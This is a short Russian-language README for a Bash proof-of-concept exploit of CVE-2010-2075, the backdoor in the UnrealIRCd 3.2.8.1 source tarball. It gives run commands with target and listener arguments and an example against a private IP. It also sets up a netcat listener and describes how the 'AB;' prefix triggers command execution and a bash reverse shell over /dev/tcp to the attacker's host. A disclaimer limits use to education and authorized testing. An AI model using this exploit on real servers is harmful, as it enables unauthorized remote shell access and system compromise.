
CVE-2010-2075 эксплойт
Bash PoC для бэкдора, внедрённого в исходный tar-архив UnrealIRCd 3.2.8.1.
Скомпрометированный бинарный файл выполняет произвольные команды с префиксом AB;, отправленные на IRC-порт.
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
Пример:
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
Перед запуском настройте слушатель:
nc -lvnp 4444
Бэкдор проверяет входящие данные на наличие префикса AB; и передаёт остаток
системной оболочке. Полезная нагрузка отправляет реверс-шелл bash через /dev/tcp.
Только для образовательных целей и авторизованного тестирования.